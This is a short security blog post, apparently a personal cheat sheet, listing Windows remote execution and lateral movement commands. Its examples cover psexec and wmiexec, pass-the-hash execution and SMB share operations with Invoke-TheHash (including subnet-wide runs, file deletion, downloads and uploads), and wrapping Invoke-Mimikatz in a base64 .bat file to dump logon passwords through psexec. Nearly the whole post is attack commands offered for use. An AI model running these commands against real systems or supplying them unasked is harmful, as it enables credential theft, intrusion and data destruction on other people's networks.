
Remote Execution

October 25, 2017 • Security

A quick filler post~

Commonly used

Psexec

psexec \\192.168.1.1 -u username -p password -d -s calc

Wmiexec

cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password

Enter-PSSession

Enter-PSSession 192.168.1.1 -Credential username

Invoke-TheHash

Project page

Modules

  • Invoke-WMIExec.ps1
  • Invoke-SMBExec.ps1
  • Invoke-SMBClient.ps1
  • Invoke-TheHash.ps1

Invoke-WMIExec

WMI command execution

Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose


Invoke-SMBExec

SMB (PsExec-style) command execution, with support for SMB1, SMB2 and SMB signing

Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose


Invoke-SMBClient

SMB file share functions

I won't translate the clumsy English; it's enough to get the gist.

List the contents of a root share directory:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose

Recursively list the contents of a share starting at the root:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share

Recursively list the contents of a share subdirectory and return only the contents output to a variable:

$directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share\subdirectory -Modify

Delete a file on a share:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\file.txt

Delete a file in subdirectories within a share:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\subdirectory\subdirectory\file.txt

Download a file from a share:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt

Download a file from within a share subdirectory and set a new filename:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\subdirectory\file.txt -Destination file.txt

Download a file from a share to a byte array variable instead of disk:

$password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt -Modify

Upload a file to a share subdirectory:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source file.exe -Destination \\server\share\subdirectory\file.exe

Upload a file to share from a byte array variable:

Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\server\share\file.txt -Modify


Invoke-TheHash

Runs the Invoke-WMIExec and Invoke-SMBExec functions against multiple targets

Invoke-TheHash -Type WMIExec -Targets 192.168.100.0/24 -TargetsExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0


ConvertTo-TargetList

Converts output for use with Invoke-TheHash

Encode PowerShell Payload Into Bat Files

Project page

Base64-encodes a PowerShell script and wraps it in a Bat file

Example

Using mimikatz as the example:

python bat_armor.py --script-path examples/Invoke-mimikatz.ps1 --target-filepath 'c:\windows\mimi.bat' --launch-string "Invoke-mimikatz -command '\"sekurlsa::logonpasswords\"'" --out examples/mimi.bat

[screenshot: bat_armor.py output]

The generated file looks like this:

[screenshot: generated mimi.bat]

Then run the file with psexec.py -c:

[screenshot: psexec.py -c execution]

Enable multiple RDP connections:

[screenshot: enabling multiple RDP connections]
